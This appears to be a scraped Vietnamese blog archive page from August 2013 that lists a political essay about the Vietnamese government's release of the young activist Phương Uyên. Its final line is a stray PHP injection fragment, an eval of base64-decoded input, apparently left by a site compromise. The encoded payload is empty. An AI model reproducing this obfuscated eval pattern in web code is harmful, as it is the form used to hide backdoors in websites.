Archive for August 17th, 2013

Áp lực nào buộc CSVN phải thả Phương Uyên?

Áp lực nào buộc CSVN phải thả Phương Uyên?

Qua nay, bên cạnh niềm vui trong lòng mọi người yêu mến Phương Uyên, việc CSVN thả cô bé 21 tuổi này cũng đã tạo nhiều tranh luận giống như khi em bị chế độ CSVN giáng xuống cuộc đời non trẻ một bản án nặng nề hồi giữa tháng Năm.

08.17.2013 | Tiểu Luận- Chính Luận |

3 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>